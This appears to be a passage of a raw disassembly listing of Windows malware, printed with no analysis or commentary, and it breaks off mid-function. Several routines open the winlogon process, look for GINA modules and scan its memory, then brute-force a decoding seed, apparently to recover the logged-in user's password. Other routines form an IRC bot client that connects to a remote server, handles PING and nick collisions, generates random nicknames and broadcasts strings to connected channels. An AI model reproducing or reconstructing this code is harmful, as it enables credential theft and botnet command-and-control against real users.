sub_417A8B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417C5D proc near ; CODE XREF: sub_417A8B+AC�p
String = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_4F541C
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4F5418
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4EC020
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword_4EC020
test eax, eax
jnz short loc_417D4A
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_417D4A
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+String], ecx
jb short loc_417D4A
loc_417CE6: ; CODE XREF: sub_417C5D+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_417D3D
push 0
push 0
call dword_4EC014
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_4EC224
test eax, eax
jnz short loc_417D2E
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417D62
loc_417D2E: ; CODE XREF: sub_417C5D+AA�j
test edi, edi
jz short loc_417D39
push edi
call dword_4EC01C
loc_417D39: ; CODE XREF: sub_417C5D+D3�j
mov eax, [esp+28h+var_10]
loc_417D3D: ; CODE XREF: sub_417C5D+8E�j
add ebx, 10h
inc [esp+28h+String]
cmp [esp+28h+String], eax
jbe short loc_417CE6
loc_417D4A: ; CODE XREF: sub_417C5D+6D�j
; sub_417C5D+7A�j ...
xor edi, edi
loc_417D4C: ; CODE XREF: sub_417C5D+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, edi
loc_417D5A: ; CODE XREF: sub_417C5D+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_417D62: ; CODE XREF: sub_417C5D+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_417DCB
lea eax, [edi+80h]
mov [esp+28h+String], eax
loc_417D78: ; CODE XREF: sub_417C5D+16C�j
add [esp+28h+String], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417DDF
push offset aMsgina ; "MSGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417DBD
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_417DBD: ; CODE XREF: sub_417C5D+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_417D78
loc_417DCB: ; CODE XREF: sub_417C5D+10F�j
test edi, edi
jz short loc_417DD6
push edi
call dword_4EC01C
loc_417DD6: ; CODE XREF: sub_417C5D+170�j
mov edi, [esp+28h+var_4]
jmp loc_417D4C
; ---------------------------------------------------------------------------
loc_417DDF: ; CODE XREF: sub_417C5D+13C�j
xor eax, eax
jmp loc_417D5A
sub_417C5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DE6 proc near ; CODE XREF: sub_417A8B+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_4F5358 ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_417E0F
xor eax, eax
jmp loc_417F8A
; ---------------------------------------------------------------------------
loc_417E0F: ; CODE XREF: sub_417DE6+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_4F5428 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_4F541C
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4F5418
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_4F5424
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_417E5F
xor esi, esi
jmp loc_417F7D
; ---------------------------------------------------------------------------
loc_417E5F: ; CODE XREF: sub_417DE6+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_4F5420 ; VirtualQueryEx
test eax, eax
jz loc_417F6C
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_417F6C
test [ebp+var_2B], 1
jnz loc_417F6C
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_417F6C
loc_417EC2: ; CODE XREF: sub_417DE6+112�j
push edi ; Str2
push offset word_4EB014 ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_417EEA
lea eax, [edi+200h]
push eax ; Str2
push offset word_4EB814 ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_417EFA
loc_417EEA: ; CODE XREF: sub_417DE6+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_417F6C
jmp short loc_417EC2
; ---------------------------------------------------------------------------
loc_417EFA: ; CODE XREF: sub_417DE6+102�j
test edi, edi
jz short loc_417F6C
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_4F53E8 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_417F35
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_4F53E4 ; FileTimeToSystemTime
test eax, eax
jz short loc_417F35
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_417F35: ; CODE XREF: sub_417DE6+12B�j
; sub_417DE6+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov dword_4EC238, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_4EC230, eax
mov Src, edi
loc_417F6C: ; CODE XREF: sub_417DE6+90�j
; sub_417DE6+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_417F7D: ; CODE XREF: sub_417DE6+74�j
push [ebp+var_4]
call ds:dword_4F533C ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_417F8A: ; CODE XREF: sub_417DE6+24�j
pop esi
leave
retn
sub_417DE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F8D proc near ; CODE XREF: sub_417A8B:loc_417B83�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_4F5358 ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_41807F
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_4F5428 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_418076
mov edi, ds:dword_4F541C
loc_417FD8: ; CODE XREF: sub_417F8D+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_4F5420 ; VirtualQueryEx
test eax, eax
jz short loc_418064
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_41806A
test [ebp+var_13], 1
jnz short loc_41806A
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_4F5424 ; ReadProcessMemory
test eax, eax
jz short loc_418056
push offset word_4EB014 ; Str2
push esi ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_418056
lea eax, [esi+400h]
push offset word_4EB814 ; Str2
push eax ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_418086
loc_418056: ; CODE XREF: sub_417F8D+9F�j
; sub_417F8D+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
jmp short loc_41806A
; ---------------------------------------------------------------------------
loc_418064: ; CODE XREF: sub_417F8D+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_41806A: ; CODE XREF: sub_417F8D+71�j
; sub_417F8D+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_417FD8
loc_418076: ; CODE XREF: sub_417F8D+3F�j
push [ebp+arg_0]
call ds:dword_4F533C ; CloseHandle
loc_41807F: ; CODE XREF: sub_417F8D+1E�j
xor eax, eax
loc_418081: ; CODE XREF: sub_417F8D+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418086: ; CODE XREF: sub_417F8D+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_4EC230, ebx
mov Src, eax
cmp [eax], cl
jnz short loc_4180A8
cmp [eax+1], cl
jz short loc_4180B0
loc_4180A8: ; CODE XREF: sub_417F8D+114�j
; sub_417F8D+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4180A8
loc_4180B0: ; CODE XREF: sub_417F8D+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:dword_4F533C ; CloseHandle
push 1
pop eax
jmp short loc_418081
sub_417F8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180C3 proc near ; CODE XREF: sub_417A8B+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4EC22C
push esi
mov esi, ds:dword_4F541C
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
mov ecx, dword_4EC22C
mov [ebp+var_4], eax
add ecx, ecx
push ecx ; Size
push Src ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr dword_4EC238
push eax
call dword_4EC018
push [ebp+var_4]
mov edi, offset byte_4EC024
push offset word_4EB014
push offset word_4EB814
push [ebp+arg_0]
push offset asc_44EE50 ; "-"
push 200h ; Count
push edi ; Dest
call __snprintf
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_4180C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41815A proc near ; CODE XREF: sub_417A8B:loc_417BC7�p
var_18 = word ptr -18h
var_16 = word ptr -16h
Dst = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_4EC22C
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_4F541C ; GetProcessHeap
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+Dst], eax
mov ebx, offset word_4EB814
mov edi, 200h
mov esi, offset byte_4EAE14
loc_4181A0: ; CODE XREF: sub_41815A+FA�j
mov eax, dword_4EC22C
add eax, eax
push eax ; Size
push Src ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_4EC018
mov eax, dword_4EC22C
and [ebp+var_10], 0
mov ecx, [ebp+Dst]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_418215
loc_4181DD: ; CODE XREF: sub_41815A+B3�j
cmp [ebp+var_8], 0
jz short loc_418232
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_418201
cmp byte ptr [ecx+1], 0
jnz short loc_418201
cmp dl, 20h
jnb short loc_4181FB
and [ebp+var_8], 0
loc_4181FB: ; CODE XREF: sub_41815A+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_418205
loc_418201: ; CODE XREF: sub_41815A+90�j
; sub_41815A+96�j
and [ebp+var_8], 0
loc_418205: ; CODE XREF: sub_41815A+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_4181DD
cmp [ebp+var_8], 0
jz short loc_418232
loc_418215: ; CODE XREF: sub_41815A+81�j
push [ebp+Dst]
push offset word_4EB014
push ebx
push [ebp+arg_0]
push offset asc_44EEA0 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 1Ch
jmp short loc_41824A
; ---------------------------------------------------------------------------
loc_418232: ; CODE XREF: sub_41815A+87�j
; sub_41815A+B9�j
push offset word_4EB014
push ebx
push [ebp+arg_0]
push offset asc_44EEF0 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 18h
loc_41824A: ; CODE XREF: sub_41815A+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_4181A0
push [ebp+Dst]
push 0
call ds:dword_4F541C ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41815A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418273 proc near ; CODE XREF: sub_41842D+2F�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4E3178 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_4182EF
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4E30F8 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4E3138 ; inet_addr
cmp eax, esi
jnz short loc_4182D4
push [ebp+arg_0]
call dword_4E317C ; gethostbyname
test eax, eax
jz short loc_4182EF
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_4182D4: ; CODE XREF: sub_418273+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4E30A0 ; connect
cmp eax, esi
jnz short loc_4182F3
push edi
call dword_4E3190 ; closesocket
loc_4182EF: ; CODE XREF: sub_418273+1B�j
; sub_418273+58�j
mov eax, esi
jmp short loc_4182F5
; ---------------------------------------------------------------------------
loc_4182F3: ; CODE XREF: sub_418273+73�j
mov eax, edi
loc_4182F5: ; CODE XREF: sub_418273+7E�j
pop edi
pop esi
leave
retn
sub_418273 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4182F9(char *Dest)
sub_4182F9 proc near ; CODE XREF: sub_401CC7+328E�p
; sub_401CC7+32FA�p ...
Dest = dword ptr 4
push esi
push edi
mov edi, [esp+8+Dest]
push offset asc_44FBC0 ; "\n"
push edi ; Dest
call _strcat
pop ecx
mov esi, offset dword_4EC244
pop ecx
loc_418311: ; CODE XREF: sub_4182F9+42�j
cmp dword ptr [esi-4], 1
jnz short loc_41832F
cmp dword ptr [esi], 0
jbe short loc_41832F
push 0
push edi ; Str
call _strlen
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_4E3148 ; send
loc_41832F: ; CODE XREF: sub_4182F9+1C�j
; sub_4182F9+21�j
add esi, 210h
cmp esi, offset dword_4F2964
jl short loc_418311
pop edi
pop esi
retn
sub_4182F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418340(char *Str,int)
sub_418340 proc near ; CODE XREF: sub_41842D+155�p
Dst = byte ptr -420h
Dest = byte ptr -220h
Str2 = dword ptr -20h
var_1C = dword ptr -1Ch
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
push edi
push offset asc_44FBC4 ; " "
push [ebp+Str] ; Str
call _strtok
pop ecx
mov [ebp+Str2], eax
pop ecx
lea esi, [ebp+var_1C]
push 7
xor ebx, ebx
pop edi
loc_418366: ; CODE XREF: sub_418340+39�j
push offset asc_44FBC8 ; " "
push ebx ; Str
call _strtok
mov [esi], eax
pop ecx
add esi, 4
dec edi
pop ecx
jnz short loc_418366
cmp [ebp+Str2], ebx
mov esi, [ebp+var_1C]
jnz short loc_41838F
cmp esi, ebx
jnz short loc_41838F
push 1
pop eax
jmp loc_418428
; ---------------------------------------------------------------------------
loc_41838F: ; CODE XREF: sub_418340+41�j
; sub_418340+45�j
push [ebp+Str2] ; Str2
push offset aPing_1 ; "PING"
call _strcmp
pop ecx
pop ecx
test eax, eax
push esi ; Str2
jnz short loc_4183AA
push offset aPongS_0 ; "PONG %s\n"
jmp short loc_4183F8
; ---------------------------------------------------------------------------
loc_4183AA: ; CODE XREF: sub_418340+61�j
push offset a433 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4183CB
push esi ; Str2
push offset a432 ; "432"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_418426
loc_4183CB: ; CODE XREF: sub_418340+78�j
push 200h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418650
add esp, 10h
lea eax, [ebp+Dst]
push eax
push offset aNickS_9 ; "NICK %s\n"
loc_4183F8: ; CODE XREF: sub_418340+68�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
call dword_4E3148 ; send
loc_418426: ; CODE XREF: sub_418340+89�j
xor eax, eax
loc_418428: ; CODE XREF: sub_418340+4A�j
pop edi
pop esi
pop ebx
leave
retn
sub_418340 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41842D proc near ; DATA XREF: sub_4185D2+61�o
Dest = byte ptr -4008h
var_3008 = byte ptr -3008h
Dst = byte ptr -2008h
Str = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
push 1
pop edi
lea eax, dword_4EC24C[esi]
mov dword_4EC240[esi], edi
push dword_4EC44C[esi]
push eax
call sub_418273
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_4EC244[esi], eax
jb loc_4185B2
mov edi, 1000h
lea eax, [ebp+Dst]
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418650
lea eax, [ebp+Dest]
push eax ; Dest
call sub_418650
lea eax, [ebp+var_3008]
push eax ; Dest
call sub_418650
add esp, 18h
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push dword_4EC244[esi]
call dword_4E3148 ; send
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_418509: ; CODE XREF: sub_41842D+111�j
; sub_41842D+180�j
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Str]
push ebx
push edi
push eax
push dword_4EC244[esi]
call dword_4E3110 ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_4185B2
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_4], eax
jz short loc_418509
loc_418540: ; CODE XREF: sub_41842D+17E�j
mov al, [ebp+eax+Str]
cmp al, 0Dh
jz short loc_418567
cmp al, 0Ah
jz short loc_418567
cmp [ebp+arg_0], 0FA0h
jz short loc_418567
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+Dst], al
jmp short loc_4185A1
; ---------------------------------------------------------------------------
loc_418567: ; CODE XREF: sub_41842D+11C�j
; sub_41842D+120�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4185A1
push dword_4EC244[esi] ; int
mov [ebp+eax+Dst], bl
lea eax, [ebp+Dst]
push eax ; Str
call sub_418340
pop ecx
test eax, eax
pop ecx
ja short loc_4185B2
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_4185A1: ; CODE XREF: sub_41842D+138�j
; sub_41842D+13F�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_4], eax
jnz short loc_418540
jmp loc_418509
; ---------------------------------------------------------------------------
loc_4185B2: ; CODE XREF: sub_41842D+40�j
; sub_41842D+107�j ...
mov dword_4EC240[esi], ebx
mov esi, dword_4EC244[esi]
cmp esi, ebx
jbe short loc_4185C9
push esi
call dword_4E3190 ; closesocket
loc_4185C9: ; CODE XREF: sub_41842D+193�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41842D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4185D2(char *Source,int,int)
sub_4185D2 proc near ; CODE XREF: sub_401CC7+31DB�p
var_8 = byte ptr -8
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_41864B
loc_4185E4: ; CODE XREF: sub_4185D2+77�j
xor edi, edi
mov eax, offset dword_4EC240
loc_4185EB: ; CODE XREF: sub_4185D2+28�j
cmp [eax], ebx
jz short loc_4185FC
add eax, 210h
inc edi
cmp eax, offset dword_4F2960
jl short loc_4185EB
loc_4185FC: ; CODE XREF: sub_4185D2+1B�j
cmp edi, 31h
jz short loc_41864B
mov esi, edi
push [ebp+Source] ; Source
imul esi, 210h
lea eax, dword_4EC24C[esi]
push eax ; Dest
call _strcpy
mov eax, [ebp+arg_4]
pop ecx
mov dword_4EC44C[esi], eax
pop ecx
lea eax, [ebp+var_8]
mov dword_4EC240[esi], 1
push eax
push ebx
push edi
push offset sub_41842D
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4185E4
loc_41864B: ; CODE XREF: sub_4185D2+10�j
; sub_4185D2+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4185D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418650(char *Dest)
sub_418650 proc near ; CODE XREF: sub_401CC7+3747�p
; sub_401CC7+378D�p ...
Source = byte ptr -40h
var_2D = byte ptr -2Dh
Dst = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
Count = dword ptr -0Ch
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
call _rand
mov [ebp+Count], eax
fild [ebp+Count]
fmul ds:dbl_43C4D8
call __ftol
cmp eax, 1
jnz short loc_41869A
call _rand
call _rand
push 66h
cdq
pop ecx
idiv ecx
push off_44F244[edx*4]
jmp short loc_4186B3
; ---------------------------------------------------------------------------
loc_41869A: ; CODE XREF: sub_418650+2F�j
call _rand
call _rand
cdq
mov ecx, 0C0h
idiv ecx
push off_44EF44[edx*4] ; Source
loc_4186B3: ; CODE XREF: sub_418650+48�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcpy
pop ecx
lea eax, [ebp+Dst]
pop ecx
push ebx
push esi
push edi
push eax ; Str
call _strlen
pop ecx
mov esi, eax
push 13h
mov [ebp+var_4], esi
pop eax
sub eax, esi
mov [ebp+Count], eax
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4D0
call __ftol
mov ebx, eax
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_43C4C8
call __ftol
cmp esi, 2
mov edi, offset a__3 ; "-|`_\\{[]}"
jle short loc_418726
cmp esi, 3
jnz short loc_41871D
cmp ebx, 1
jz short loc_418726
loc_41871D: ; CODE XREF: sub_418650+C6�j
cmp eax, 1
jnz loc_4187E0
loc_418726: ; CODE XREF: sub_418650+C1�j
; sub_418650+CB�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4C0
call __ftol
push off_44F244[eax*4] ; Source
lea eax, [ebp+Source]
push eax ; Dest
call _strcpy
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+Dst]
push eax ; Val
push edi ; Str
call _strchr
add esp, 10h
test eax, eax
jnz short loc_4187CD
movsx eax, [ebp+Source]
push eax ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_4187CD
call _rand
mov dword ptr [ebp+var_18+4], eax
dec esi
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], esi
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43C4C8
call __ftol
cmp eax, 1
jnz short loc_4187CD
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-8]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-8]
fmul ds:dbl_43C4C8
call __ftol
mov al, byte ptr a__3[eax] ; "-|`_\\{[]}"
mov [ebx], al
loc_4187CD: ; CODE XREF: sub_418650+111�j
; sub_418650+122�j ...
push [ebp+Count] ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call _strncat
add esp, 0Ch
loc_4187E0: ; CODE XREF: sub_418650+D0�j
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
mov esi, eax
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+Dst]
push eax ; C
mov [ebp+var_4], esi
call _isdigit
pop ecx
test eax, eax
pop ecx
jnz loc_418A48
and [ebp+Count], eax
movsx eax, byte ptr [ebx-1]
push eax ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz loc_41893F
call _rand
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
